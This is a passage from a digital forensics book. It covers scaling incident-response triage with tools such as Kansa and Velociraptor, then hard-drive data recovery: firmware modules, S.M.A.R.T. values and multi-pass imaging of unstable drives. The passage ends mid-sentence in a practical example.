series. It can be found here²⁴⁸.
macOS and Linux
Similar tools like KAPE also exist for other operating systems. One of the tools that deals exclusively
with macOS (and its mobile counterparts iOS and iPadOS) is mac_apt²⁴⁹. It can extract a wealth of
information from a macOS system and can deal with a variety of images and acquired data. mac_apt
can be used exclusively on forensic images. Fortunately, there exists a live response counterpart.
Named the Unix Artifact Collector²⁵⁰ (or UAC for short), it can acquire data from both macOS and
a range of Linux distributions. Both tools are open-source and any contribution is welcomed.
²⁴⁴https://github.com/EricZimmerman/KapeFiles/blob/master/Targets/Compound/KapeTriage.tkape
²⁴⁵https://github.com/EricZimmerman/KapeFiles/blob/master/Modules/Compound/!EZParser.mkape
²⁴⁶https://ericzimmerman.github.io/#!index.md
²⁴⁷https://aboutdfir.com/toolsandartifacts/windows/timeline-explorer/
²⁴⁸https://www.youtube.com/watch?v=43D18t7l7BI
²⁴⁹https://github.com/ydkhatri/mac_apt
²⁵⁰https://github.com/tclahr/uac
Chapter 11 - Scaling, scaling, scaling, a tale of DFIR Triage 213
Scaling up to a medium-sized subnet
The aforementioned tools work fantastically on a single host but how can we scale this to a subnet?
The Kansa PowerShell IR Framework was created by Dave Hull to facilitate a growing need in
the DFIR community, determining where deep-dive forensics should take place in ever-expanding
networks.
To do this, Kansa operates on two assumptions, malware needs to be present on the machine to
perform its actions and malicious activity is relatively rare and therefore automatically stands out.
To accomplish this Kansa is made up of two distinct components.
The collection component is able to collect a number of lightweight artifacts including autostart
locations, services, new admin users etc. The type of artifact is determined by a PowerShell script,
each artifact uses its own script. These scripts are tied together with a Kansa master script. The master
script is used to set which evidence needs to be collected. The Kansa scripts need to be executed on
each server where evidence needs to be collected. To facilitate a secure transfer of credentials, it
uses PowerShell remoting for this purpose. Kansa also integrates with third-party executables. Any
required executable can automatically be pushed to the various servers.
The second component is analysis with Kansa. These scripts stack the output of each gathered
evidence item and counts the presence of each item. In this manner, outliers become more easily
visible.
A limitation of Kansa is that it uses persistent PowerShell connections until a script has been
completed. For this reason, it is not recommended to use Kansa for more then 100 hosts. A distributed
version of Kansa, developed by Jon Ketchum, addresses this limitation. The distributed version lifts
many of the limitations of the original version. Persistent connections are no longer required. Larger
data sets also require an optimized parsing method. For this reason the distributed version of Kansa
uses an ElasticSearch backend. You’re encouraged to check out the original²⁵¹ talk.
macOS and Linux don’t have similar tools but this shouldn’t necessarily be be a problem. Both
operating systems have a long history of text manipulation tools like awk, grep and uniq. Depending
on the retrieved information, a combination of these tools can be used to achieve the same results.
Scaling up to an entire network
Individual hosts and small networks are discussed, what are the options when you deal with a
massive network? A single tool can be used in that instance. Velociraptor is another additon to
the open-source DFIR arsenal. Upon its arrival in 2018 it quickly gathered a following and it isn’t
difficult to see why. Velociraptor is one of the most powerful tools in the DFIR community. For
starters, it supports all the major operating systems, Windows, macOS and Linux alike. What makes
Velociraptor stand out is its distributed computing model along with a client/server approach.
²⁵¹https://www.youtube.com/watch?v=ZyTbqpc7H-M
Chapter 11 - Scaling, scaling, scaling, a tale of DFIR Triage 214
A Velociraptor instance consists of a server and a number of clients distrubuted through a (client)
network. The agent creates a persistent connection to the server.
Analysts can use Velociraptor to:
• Retrieve any file on a connected endpoint in a forensically sound manner
• Retrieve forensic artifacts from all connected endpoints with the push of a button
• Scan for IOCs utlizing both regex and YARA rules
• Push and utilize third-party command line tools on all hosts running an agent
It is not possible to do Velociraptor justice within a short section of this chapter. Rather then describe
it, it is advised to see the tool in action. Eric Capuano recently gave a rundown²⁵² on Velociraptor
using a small network. Furthermore, Michael Cohen also developed his own tutorial series which is
currently available free of charge on this link²⁵³.
Other tools
A number of other triage tools aren’t discussed in depth but are still quite useful while performing
triage. They can either be used on a standalone basis or pushed by Velociraptor. Be aware that these
tools might set off AV due to their included malware signatures.
• Autoruns²⁵⁴ or its CLI version Autorunsc, useful for enumerating all ASEP locations on a host
• DeepBlueCLI²⁵⁵, a tool which enables threat hunting using the Windows Event logs
• Chainsaw²⁵⁶, a similar tool which can group significant events
• Loki²⁵⁷, an IOC/Yara scanner which can enumerate known malicious files on a host
• Hayabusa²⁵⁸, an expansive threat hunting scanner which offers timelining capabilities
Practicing triage
Triage can be practiced on any number of forensic disk images. The following community images
are included as recommendation:
• DFIR Madness - The case of the stolen Szechuan sauce²⁵⁹
• Digital Corpora - 2012 National Gallery DC Scenario²⁶⁰
• Digital Corpora - 2019 Narcos Scenario²⁶¹
• Cyberdefenders - Pawned DC²⁶²
²⁵²https://www.youtube.com/watch?v=Q1IoGX--814
²⁵³https://docs.velociraptor.app/training/
²⁵⁴https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns
²⁵⁵https://github.com/sans-blue-team/DeepBlueCLI
²⁵⁶https://github.com/WithSecureLabs/chainsaw
²⁵⁷https://github.com/Neo23x0/Loki
²⁵⁸https://github.com/Yamato-Security/hayabusa
²⁵⁹https://dfirmadness.com/the-stolen-szechuan-sauce/
²⁶⁰https://digitalcorpora.org/corpora/scenarios/national-gallery-dc-2012-attack/
²⁶¹https://digitalcorpora.org/corpora/scenarios/2019-narcos/
²⁶²https://cyberdefenders.org/blueteam-ctf-challenges/89
Chapter 11 - Scaling, scaling, scaling, a tale of DFIR Triage 215
Contributions and sources
Forensic triage, perhaps more than any other aspect of forensics relies on input of the entire
community. Without the aid of the developers in this section, triage would surely be more difficult.
• Eric Zimmerman for creating the variety of parsers and KAPE.
• Andrew Rathbun for creating a multitude of KAPE Targets.
• Yogesh Khatri for creating the mac_apt acquisition framework.
• Thiago Lahr for his development of the Unix Artifact Collector.
• Dave Hull for creating Kansa and Jon Ketchum for extending the original suite with Distribut-
edKansa.
• Michael Cohen for creating Velociraptor.
• Eric Conrad for his work on DeepBlueCLI.
• Nextron Systems for developing the Loki scanner.
• WithSecure Labs for developing the Chainsaw EVTX scanner.
• Yamato Security for creating the Hayabusa threat hunting scanner.
Also information from the sources below was used in creating this chapter:
• Richard Davis for creating the excellent 13Cubed YouTube series.
• Eric Capuano for demoing the powerful capabilities of Velociraptor.
Chapter 12 - Data recovery
By Mark B.²⁶³ | Website²⁶⁴ | Instagram²⁶⁵
Types of data recovery
When talking about data recovery, it is important to distinguish between:
• Logical data recovery
• Physical data recovery
Both topics will be covered in this chapter.
²⁶³https://opensource-data-recovery-tools.com/
²⁶⁴https://data-recovery-prague.com/
²⁶⁵https://www.instagram.com/disk.doctor.prague/
Chapter 12 - Data recovery 217
Logical data recovery
This is the type of data recovery which is offered by most forensics-tools and a lot of specialized
programs. A logical data recovery can mean:
• to restore deleted files,
• to deal with a damaged filesystem-catalogue or
• to repair damaged files.
As good as forensics tools are for conducting an investigation, most tools fall very short when
handling corrupted filesystems. On the other side, there are really great logical recovery tools,
including but not limited to:
• R-Studio²⁶⁶
• UFS-Explorer²⁶⁷
• DMDE²⁶⁸
These tools are able to handle even the most severe damaged filesystems very well. The problem with
forensics is the way such tools work. So-called data recovery programs analyse the whole drive and
try to “puzzle” a filesystem together based on the data which was found.
That means that such a generated virtual filesystem is the interpretation of the data by the tool. It
would be very hard, and even impossible, in some cases to fully understand how the program got
to the final result. As great as these tools are for recovering data and building a working folder-tree
from corrupted filesystems, they may not be ideal for forensics as the processes which lead to the
results are not always clear.
²⁶⁶https://r-studio.com
²⁶⁷https://www.ufsexplorer.com
²⁶⁸https://dmde.com
Chapter 12 - Data recovery 218
Physical data recovery
This category contains all kind of cases – for example:
• unstable drives,
• damaged PCBs (printed circuit boards),
• firmware-issues,
• head stuck on platters,
• broken motors,
• broken read-write-heads and even
• damaged or dirty platters.
In case of flash-memory like memory-cards, pendrives or SSDs there are just:
• electronical problems and
• firmware-issues, which made up the majority of the cases.
So, first of all you need to come to a conclusion as to how far does it make sense to go with data
recovery when conducting a forensics investigation. I have thought about that for quite some time
and I think the most forensics investigators will not want to build a fully-fledged data recovery
operation and start with cleanroom data recovery or dive very deep into firmware-repair. Generally
speaking, most forensic investigators probably don’t want to outsource the imaging of a drive to a
data recovery lab just because Windows will drop the drive after it become unstable.
I guess many will also want to handle a PCB-swap without a data recovery lab.
That is for sure an individual decision but going deeper into data recovery would need much
more information than I could fit into one chapter. If you are interested in detailed introduction to
professional data recovery, I would recommend you my book Getting started with professional
data recovery²⁶⁹ (ISBN 979-8800488753).
With the above-mentioned use cases in mind, we can have a look at the right tools to fit that need.
These are my preference:
• Guardonix²⁷⁰
• RapidSpar²⁷¹
• DeepSpar Disk Imager²⁷²
²⁶⁹https://www.amazon.com/dp/B09XBHFNXZ/
²⁷⁰https://guardonix.com/
²⁷¹https://rapidspar.com/
²⁷²https://www.deepspar.com/products-ds-disk-imager.html
Chapter 12 - Data recovery 219
The Guardonix is a quite powerful writeblocker which allow you to handle unstable drives by
maintaining two independent connections - one to the PC which is maintained even when the drive
is hanging or irresponsible and one to the drive itself. In this way the operating system is not aware
of any issues the drive may have. With the professional edition of the tool the operator may even
set a timeout to skip bad areas on the first pass.
The RapidSpar is a highly automated solution for easier data recovery cases. It allows just for a
basic level of control but it can handle even some firmware-cases automatically. The tool is mainly
designed for PC repair shops to offer semi-professional data recovery services but with the data
acquisition addon it would become a quite interesting tool for a forensics lab. Just a pity the tool
lacks even the most basic forensic functions!
It’s good to have that firmware-capabilities but RapidSpar is not documenting anything it does and
so it’s absolutely a no-go for forensics. For entry-level data recovery operations this tool is a good
choice but you may reach its limits quite fast because the tool supports basically no manual control.
The DeepSpar Disk Imager, for short DDI, is a PCIe-card which can handle the cloning of highly
unstable drives and this tool is the most professional data recovery tool but strictly limited to imaging.
It is also ready for forensic imaging and it can calculate checksums on the fly. The DDI is also know
in the data recovery industry for its great handling of unstable drives.
The way a DDI reports errors is also great for diagnosis as the imaging progresses - errors are shown
in the sector map as red letters. For example, an I means “sector ID not found” and if you just get
reading errors with the letter I after a certain LBA the drive has most probably a translator issue
(see firmware/error register).
DeepSpar Disk Imager and RapidSpar have another advantage over the Guardonix/USB Stabilizer.
These tools can build a headmap and ignore all sectors which belong to a defective head. This also
allow you to identify bad heads and image good heads first which is safer.
Chapter 12 - Data recovery 220
How to approach a data recovery case
Before thinking about a data recovery attempt you would have to understand what is the cause of
the issue and how to deal with it. This is very important because a wrong approach can damage
drives.
That’s why the first step is always the diagnosis! To properly diagnose an HDD, you need to
understand the startup procedure, the firmware and the sounds a drive will make with certain issues.
HDD start-up process
Put simply, you can divide the boot process of the HDD into the following steps:
1. The data from the ROM chip is loaded and the engine is started.
2. If the motor rotates fast enough for an air cushion to form, the read/write head is moved from
the parking position (inside the spindle or outside the platters on a ramp) onto the platters.
3. The first part of the firmware loaded from ROM contains the instructions on how the disk can
load the remaining part of the firmware from the platters. This is located in an area on the
platters, the so-called service area, which is not accessible by the user.
4. If the firmware could be fully loaded, the disk reports that it is ready for use. Knowing about
this boot process can help us a lot in diagnosing problems. If a disk spins up, it most likely
means that the ROM, MCU, RAM and motor control are OK and PCB damage can be ruled out
with a high degree of probability.
HDD firmware
A hard drive isn’t just a dumb peripheral device, it’s a small computer with a processor, memory,
and firmware that’s quite similar to an operating system. In the meantime, only 3 manufacturers,
who have bought up many other competitors on their way, have prevailed in the market. Therefore,
despite all the differences between the manufacturers, the firmware of hard drives follows a similar
structure. The firmware is divided into different modules, which represent either data (G-List, P-List,
S.M.A.R.T. data, …) or executable code.
In general, the individual modules can be divided into the following categories:
1. The servo subsystem, which can be compareed to drivers on a PC. On the HDD, for example,
it’s responsible for controlling and operating the head and the motor. The Servo-Adaptive
Parameters (SAP) are there to correctly address these parts of the HDD. Damage in these
modules can also result in the motor not running or the head making clicking noises.
2. The read/write subsystem provides the addressing (CHS, LBA, PBA, …). This category includes
Zone-Table, G-List, P-List, …
3. The firmware core is responsible for ensuring that all modules and components work together
and can therefore best be compared to an operating system kernel.
Chapter 12 - Data recovery 221
4. The additional programs are very individual and depend on the model family and manufacturer,
just like user software on a PC. These include, for example, self-test and low-level formatting
programs.
5. The interface is responsible for communication via the SATA/PATA port and in some cases
also for communication via the serial port that some hard drives provide.
The higher layers build on the layers below. Therefore, the nature of a problem can already indicates
at which level or levels you have to look.
A small part of the firmware is present on the ROM chip or directly in the MCU (Micro Controller
Unit). This part can be imagined as a mixture of BIOS and boot loader. It runs a self-test and then
uses the head of the drive to load the rest of the firmware from the platters.
We find the remaining parts of the firmware in the so-called service area (SA) on the platters. This
is a special area on the platters that is not accessible to a normal user. Usually, there are at least two
copies, which can then be read via head 0 and head 1.
To access the service area you need special software like WD Marvel and Sediv or special hardware
tools like PC-3000, MRT, DFL SRP or DFL URE (but URE is quite limited here).
These are not tools that can be learned by trial and error. Any incorrect use of various options can
damage the hard drive. If you try to repair a healthy module, there is a high chance that it will be
damaged afterwards and if it is a critical module, the HDD will not start anymore.
Also, the options offered vary depending on the vendor and model of the hard drive, so you can
only perform certain actions on certain models. The learning curve of these tools is extremely steep
and a lot depends on the tool used. Mastering a firmware tool takes a lot of practice and experience,
which you build up over the years working with other DR technicians, attending training courses
and conferences, and working with support on specific cases.
So, this area of data recovery requires the greatest learning effort and the purchase of the most
expensive tools represents only a very small part of the cases. Therefore, there are quite a few
laboratories that only treat these firmware problems to a small extent themselves and outsource
harder cases. MRT offers, for example, that their technicians solve firmware problems via remote
sessions and charges $50 USD in case of a successful data recovery. DFL offers its customers up to 5
support requests per month for free, just like Ace Labs.
The possible causes of firmware problems are just as varied as the solutions:
• G-List or S.M.A.R.T. logs fill up or run into other modules (similar to a buffer overflow in
RAM) and partially overwrite them.
• The data of a module was written incompletely or is damaged due to other errors (e.g. failed
sector).
• The data in the ROM chip does not match the data in the service area.
• The ROM chip is mechanically damaged or short-circuited.
• etc.
Chapter 12 - Data recovery 222
If you think about the start-up process of the HDD, then from the perspective of the firmware, the
ROM chip is read first, then the servo subsystem, then the read/write subsystem and then everything
else is loaded to provide access to the user data.
If this process is not completed, it is not uncommon to have read and write access to the service area
but not to the user data.
Most of the commands that allow access to the firmware are manufacturer-specific and unfortu-
nately not documented - at least not publicly!
There are some data recovery laboratories that have access to confidential company-internal doc-
uments of the manufacturers with the documentation of various firmware versions, manufacturer-
specific ATA commands or the like and sometimes also pass them on to others on the sly.
In many areas, leaked information like the ones mentioned above or reverse engineering is the only
source of information.
Some basic information can be found online as well as in firmware tool manuals. Anyone who
starts looking into this will have to invest some time here and read up accordingly whenever new
information is encountered.
Important parts of the firmware
As you already know the service area is divided into modules, of which certain modules are essential
for the operation of the disk and others are not necessary.
If a disk cannot read data from copy 0, then it will usually try to read from copy 1. It can therefore
take a while before an HDD reports that it is ready. The firmware often makes several read attempts
before switching to the next copy. The more modules are damaged, the longer this can take. I’ve
seen hard drives which needed several minutes to become ready.
Some modules are unique to each disk and other modules are the same for all disks with a specific
firmware version, or even for all disks of an entire model range.
Damaged modules that are not individual for each hard disk can often be loaded from donor
disks or obtained from the Internet and then used to repair a customer disk. Within the firmware
sectors, there is another type of addressing - the so-called UBA addressing (Utility Block Address).
Sometimes it’s also called the Universal Block Address - that’s because manufacturers of data
recovery tools don’t have access to the firmware developer’s documentation and find out most of
it by reverse engineering and then just naming things themselves. That is why the individual terms
also differ between the individual firmware tools (PC-3000, MRT, DFL).
The following parts can be found in one or another way on each HDD firmware and it’s very
important to understand these things to recover data from an HDD.
P-List
This list includes sectors that were defective at production time. That’s why it is called primary,
permanent or production time defects list. That the hard disk is not forced to execute jumps with
Chapter 12 - Data recovery 223
the head from the beginning due to unmapped sectors, the sectors that were already defective at
production time are skipped and the LBA-numbering is structured in such a way that it is consecutive
from sector 0 to N and the defects in between are simple are skipped:
12.1 - P-list
This also show how the PBA (physical block addressing) differs from LBA (logical block
addressing). The P-List is one of that modules that are unique to each hard drive and cannot
be replaced.
G-List
The growing defects list or G-List is a list of sectors that fail during operation. To avoid having to
move several TB of data by one sector in the worst case, a defective sector is replaced with the next
free reserve sector during operation:
12.2 - G-list
If a read- or wite- error occurs, the sector is marked as defective and mapped out on the next
opportunity when the disk is idle. This happens in so-called background-processes which start in
most cases after 20 seconds of idle-time.
That’s why professional data recovery labs disable unnecessary background activities in order not
to corrupt data and save the disk unnecessary work. If you do not have that option, you need to pay
attention to the drive and don’t let it run when it is not in use.
If the G-List is lost, data will be damaged because sectors mapped out during operation are reset
to the old locations. However, this can also be used in a forensic investigation to recover old data
fragments in the sectors which got mapped out, even after the disk has been wiped.
However, this also means that a hard disk becomes slower and slower the more unmapped sectors
there are because the more often the head has to make jumps to the new location of a LBA when
reading the data.
Depending on the manufacturer/model series, this is slightly different. Many disks have smaller
reserve areas distributed over the platters to minimize any necessary jumps and the associated loss
Chapter 12 - Data recovery 224
of performance.
Translator
The translator is the module that converts the LBA address into the corresponding arm movement.
If the translator is defective, you have no access to the data. It is relatively easy to test whether the
translator has a problem.
Zone tables
Zones make it possible to use a different number of sectors per track.
The old CHS (Cylinder, Head, Sectors) addressing assumed that each track or cylinder had the same
number of sectors. Since the radius of the cylinders decreases with each step in the direction of the
spindle, a lot of space would be wasted if the outer cylinders had the same number of sectors as the
inner cylinders.
Here is a simplified graphic representation for comparison:
12.2 - HDD with and without zone tables
What is graphically displayed here is saved by the zone table in a form that can be used by the
firmware. Without this data, it would not be possible to calculate the location of a specific LBA
address is on the platters!
Servo parameters/Servo adaptive parameters
This data is used to fine-tune the head and is unique to each hard drive. Incorrect data can lead to
the head no longer reading or only reading with reduced performance.
There are often different data sets for the service and user area.
Security-relevant data/passwords
Some encryption methods save the passwords on the hard disk in the service area. In these cases,
passwords can be easily read out or removed with access to the firmware modules.
Chapter 12 - Data recovery 225
Firmware/overlay code
To put it simply, these are program instructions that are loaded into the main memory of the HDD
when required.
As with very old computers, the working memory of hard disks is very limited and therefore
developers have to be careful with it.
Depending on the context in which these terms are used, it is code that is loaded when required, like
a DLL, or code that is loaded from the service area and overwrites the first rudimentary program
parts loaded from the ROM.
In any case, the term is more common for special code parts that are loaded into the RAM of the
HDD when needed and then replaced with other code parts in the RAM when the function is no
longer needed.
S.M.A.R.T. data
S.M.A.R.T. was developed to warn the user before a hard drive fails. Often S.M.A.R.T. however, is
the cause of such a failure.
When the S.M.A.R.T. log becomes corrupted and contains invalid data that the disk cannot process,
causing the disk to fail to fully boot and never report that it is ready.
Since S.M.A.R.T. is not essential for operation, deleting the S.M.A.R.T. data and disabling the
S.M.A.R.T. functions is the simplest solution to this problem.
Serial number, model number and capacity
In many cases, the serial and model numbers are read from the service area. If a hard drive shows
the correct model and serial number, as well as capacity and firmware version, this is a very strong
indicator that the head can at least read the service area.
If there is no access to the user data, but the above-mentioned values are displayed correctly (data
recovery technicians call that a “full ID”), you can determine with a high degree of certainty that at
least one head is OK and can read.
Safe mode
Hard drives have a safe mode that they go into if some part of the firmware is corrupt. This is
manifested by multiple clicks, shutting down and restarting the motor and then starting again.
Smaller 2.5” laptop drives often just shut down and don’t try multiple times.
PC-3000 recognizes this problem itself and shows us that a hard disk is in safe mode.
You can also put the hard drive into safe mode on purpose. The hard disk then waits for suitable
firmware to be uploaded to the RAM. This is also referred to as a “loader”.
Once the loader has successfully uploaded and is running, you can start repairing corrupted
firmware modules.
Chapter 12 - Data recovery 226
Status and error registers
Besides the noise and behaviour of a drive there are status information which can be displayed by
some data recovery tools like DDI, MRT, PC-3000 and DFL. But there are also some free tools which
show these status flags like Victoria²⁷³ or Rapid Disk Tester²⁷⁴.
12.3 - status flags from MRT
These indicated status LEDs also help with diagnostics.
BSY means “busy” and indicates that the disk is working. It’s OK to leave an HDD or SSD on BSY for
a while and wait, as long as the disk isn’t making any weird noises! BSY is the first status that the
HDD shows before the firmware is fully loaded. Here I monitor an SSD with a thermal camera and
an HDD with a stethoscope.
DRD stands for “drive ready” and means that the hard disk is ready to receive commands.
DSC means “drive seek complete” and indicates that the head has moved to a specific position.
DWF means “drive write fault” and should always be off.
DRQ means “data request” and is set when the data carrier is ready to transfer data.
CRR stands for “corrected data” and should always be off.
IDX means “index” and should always be off.
ERR stands for “error” and indicates if an error occurred with the previous command. The error is
then described in more detail by the following error codes:
• BBK (bad block)
• UNC (uncorrectable data error)
• INF (ID not found)
• ABR (aborted command)
• T0N (Track 0 not found)
• AMN (Address marker not found)
The abbreviations can differ hereby from tool to tool.
Diagnosing the issue
Until now you have learned how to get a better picture of the inner processes of an HDD so it’s time
to use that knowledge practically…
²⁷³https://hdd.by/victoria/
²⁷⁴https://www.deepspar.com/training-downloads.html
Chapter 12 - Data recovery 227
It would be hard to describe some of the sounds you may hear when a drive has a certain issue –
luckily a data recovery lab has recorded a lot of sound samples and offer then on their homepage.
You can find the files here²⁷⁵.
If a disk spins up but then gets stuck in the BSY state, this indicates that parts of the firmware are
corrupt or unreadable. Or background processes are running on the hard disk that hangs or takes
a long time to finish. It can be also due to issues reading the firmware from platters. If the drive
sounds OK then wait a few minutes and see if the drive come ready. If a drive is not ready within
10-15 minutes, then it’s highly unlikely it will become ready when you wait longer. Most likely you
will need a firmware-tool and the proper knowledge to deal with that issue.
If a disk reports readiness but reports unusual values - eg: 0 GB or 3.86 GB for the capacity. Then an
essential part of the firmware may be corrupted or only the part from the ROM chip could be read.
It’s also possible that the ROM chip is wrong (e.g. an amateur attempting a data recovery and just
swapped the PCB) or the head is damaged and can’t read the data from the service area or an early
loaded firmware module is corrupted.
If the head keeps clicking, it can sometimes indicate a firmware problem or the wrong ROM chip
on the PCB. But much more likely the head could be defective and not find the service area because
it can no longer read anything. I’ve also seen these symptoms when the ROM chip was defective.
The more experience you gain, the better you will be at assigning noises, status LEDs and other
indications from the hard drive to a specific problem. You don’t learn data recovery overnight!
Before cloning the drive try to read the first sector, if that works, read the last sector and at least one
sector in the middle of the disk. If you can read the drive until a specific LBA and sectors after this
LBA are unreadable it could either be a defective head or the translator (sometimes also called the
address decoder).
A defective head mean you can read until some point then you have a group of unreadable sectors
and after the sectors of the defective head you can read again some data. If the translator is damaged
you can’t read after a certain LBA not a single sector.
To test which issue you may face you can try to read more sectors (maybe 10 or 15) distributed
across the entire surface.
Another good indication are the S.M.A.R.T. values. The fact you can read the S.M.A.R.T. values
itself mean that the heads are good and able to read at least the service area and it also mean that
the firmware is loaded at least until the S.M.A.R.T. module which mean basically all the critical
modules are loaded.
The values itself tell you more important information:
• 0x05 (Reallocated Sectors Count) tells you how much bad sectors got reallocated
• 0x0A (Spin Retry Count) tells you how often the drive trys to spin up multiple times until it
reach the desired RPM. This can indicate a mechanical problem.
²⁷⁵https://datacent.com/failing_hard_drive_sounds
Chapter 12 - Data recovery 228
• 0xBB (Reported uncorrectable Error) tells you how many Errors could not be corrected by
ECC. This can indicate fading of the magnetic load on the platters when the drive was long
time not in use or degradation of the head or magnetic coating.
• 0xBC (Command Timeout) tells you how often a timeout occur while trying to execute
a command. This can indicate sometimes problems with the electronics or oxidized data
connections.
• 0xC4 (Reallocation Event Count) tells you how many sector reallocations were done
successfully and unsuccessfully.
• 0xC5 (Current Pending Sector Count) tells you how many sectors are waiting for reallocation.
This value is very important for forensics! In case the drive will be idle for longer than 20
seconds these sectors can get reallocated which could alter data.
• 0xC6 (Uncorrectable Sector Count) tells you how many sectors were not corrected by ECC.
The same as for 0xBB applies here.
• 0xC9 (Soft Read Error Rate) tells you how much not correctable software read errors
occurred. The same as for 0xBB applies here.
In the context of 0x09 (Power On Hours Count) you can conclude if the errors indicate a production-
issue and that for likely a rapid degradation of the drive (little amount of hours) or the normal
degradation over time in case the drive was in use for many hours.
The forensic importance of S.M.A.R.T. data
I recommend getting the S.M.A.R.T. values before and after imaging. As you have learned until
now – the drive will reallocate bad sectors when it stays to long in idle. This can cause big issues
when someone else calculate the checksum of the drive and it do not match up with the checksum
in your report.
Even if you pay attention that the drive will never be in idle some other investigator may let the
drive idle for a few minutes before calculating the checksum and thus this person alter the data. In
such cases it’s wise to have the S.M.A.R.T. values reported before and after imaging that you can
explain why the checksum don’t match up anymore.
In a data recovery case, some drives may have trouble booting up due to a minor scratch in the
service area which is very hard on the head when starting. So, you would not want to start the drive
multiple times as you cannot know if the head or drive may survive the next start. If you are not
able to deactivate background-processes like the reallocation of sectors, it’s in some cases necessary
to accept the smaller risk and rather lose a few sectors then the whole drive. Of course, it would be
the best way to outsource such a case to a professional data recovery lab but this is not always an
option.
Chapter 12 - Data recovery 229
Imaging of unstable HDDs
The imaging of unstable HDDs follows an easy approach - first you want to get the low hanging
fruits with a low stress-level for the drive and then you are going to fill the gaps and read the
problematic areas.
In more technical terms you need multiple imaging passes. In the first pass you use a small read
timeout (300 – 600ms) so that the head is not working to long on bad sectors. The reading-process
will look then like that:
12.4 - Simplified graphical representation the the read process
If the data is delivered by the drive before the read timeout occurs then you save the data and
continue to read the next block. If the timeout is reached the imaging device will send a reset
command to cancel the internal read retries of the drive and then the imaging continue with the
next block.
That is why the read timeout is the most important setting for handling unstable drives! As longer
a head is trying to read bad sectors as more the head can get damaged over time.
There are some drives which have bigger areas of bad sectors – in such cases it is wise to skip a certain
number of sectors to overcome the bad areas faster. If you are not sure the drive has experienced a
drop or head-crash you can’t be sure there is no minor scratch on the surface. That’s why I set in
my first imaging passes always a high number of sectors to skip (e.g. 256000) after a read error. This
ensures that you skip over bad areas or tiny scratches very fast.
If you have read all good sectors with a short read timeout you can run the next imaging pass with
a longer timeout and re-read all blocks which are skipped in the last pass.
If there are mainly skipped blocks on one pass and just occasionally read blocks then you have to
increase the timeout until you read at least 2/3 of blocks.
As you increase the read timeout with each pass, you should decrease the number of skipped sectors
after a read timeout or read error with each pass.
Chapter 12 - Data recovery 230
If your tool allows to create a headmap I would strongly suggest to do that before imaging. That
way, you can see if there is a bad head or even a completely broken head so you can skip the sectors
of that head in the first pass.
In case a drive will not be identified but got stuck in BSY it may be one of the commands used to
initialize the drive which cause the drive to hang. That’s why DDI allow to configure the commands
used to initialize the drive. Sometimes a non-standard initialization procedure will allow a drive to
become ready:
12.5 - DDI configuration of drive initialisation command sequence
In case you change the identification procedure and the drive become ready but you cannot image a
single sector you have to try another identification procedure so that the drive does not just become
ready but also give you data access!
Some imagers allow us to deactivate unnecessary functions of the drive like S.M.A.R.T., caching,
sector reallocation, etc.
The deactivation of unnecessary things makes the imaging not just a bit faster but also much lighter
for the drive. If S.M.A.R.T. is enabled, the drive will have to update the S.M.A.R.T. data each time
it hits a bad sector. This force the head to jump to the service area and write data and that is not just
more “stress” for the drive but also a risk. In case the drive would write bad data into the firmware
module the drive can develop a firmware issue and not boot anymore. That, or the module can grow
too big and damage the following module in the service area resulting in the same problem.
DDI has an option in the menu to deactivate such things (Source -> Drive Preconfiguration).
This option deactivates things based on a preset from DDI but it doesn’t allow you to select specific
things. A fully fledged firmware-tool like MRT will allow you to do that:
Chapter 12 - Data recovery 231
12.6 - MRT edit HDD ID dialogue
The next possible setting may be the read-mode. You can use the faster UDME-Modes or the older
and slower PIO-Mode if some hardware-imager will allow you to set these things like DDI, MRT,
DFL or PC-3000:
Chapter 12 - Data recovery 232
12.7 - MRT read mode selection for an imaging task
Chapter 12 - Data recovery 233
12.8 - DFL DE read mode selection for an imaging task
The other modes like Read, ignore CRC are helpful in some cases – here does the DDI a fabulous
job. MRT does exactly what the name suggests and read the data and write it to the image or target
drive no matter if the checksum of the sector matches. DDI reads the sector in this mode multiple
times and does a statistical analysis for each bit to get the most probable result instead of the first
result the drive delivers. Each way is useful when the sector checksum is corrupted. In case a very
weak head gives you bad data the statistical analysis of DeepSpar’s DDI would ensure that you get
the best possible result but the trade-off of this would be a longer imaging-duration and much more
stress on the head. That’s why this is not an option you should use on the first pass but rather on
the last imaging pass!
The idea behind using a slower read-mode is simple! An unstable drive can read maybe more stable
in a slower speed. There are also cases where a firmware-part is damaged and the drive is highly
unstable in UDMA for example but PIO would use another fully functional part of the firmware.
Different read-commands also apply different procedures and, in some cases, you may be able to
read bad sectors with another read-mode. That’s why I recommend using different Read-modes in
different passes.
The same apply for the read method (LBA, CHS, …)!
The last option I want to mention is the imaging direction - forward or backward. In backward-
imaging the drive is bypassing the cache and that’s how you can overcome issues with the cache.
That makes the imaging-process also much slower but slow imaging of good data is much better
then fast imaging of data corrupted by the cache!
You can also see that different Tools offer different levels of control and different options. If I need
to use the ignore CRC option, I would use for sure the DDI and not the MRT and DFL would not
even give me that option at all. In case of mode-control DFL would give me more granular control.
Chapter 12 - Data recovery 234
That’s also why a full-blown data recovery operation need a lot of different tools to select the tool
which fits best for each job.
There are even more options to optimise the imaging. One of them would be the reset-commands.
You may choose between hardware- and software-reset. Some drives may process one of that resets
much better or faster than the other. I have even seen drives freezing when issuing the “wrong” reset
command.
Practical example – imaging a WD40NMZW with the Guardonix
writeblocker
This is a drive I have recently recovered and the drive is highly unstable and is has a lot of bad sectors
with a very weak head because the local PC repair shop has tried to recover the data by scanning
the drive with a data recovery program which took multiple days because of internal read-retries.
Finally, the head got that much damaged that Windows started to hang when the drive was directly
connected and after a while Windows just dropped the HDD.
This is also a good example for the damage a wrong data recovery approach can cause. At least the
head is not totally dead – so you have something to work with.
I was thinking about that example for a while and I think the most useful tool for a forensics lab
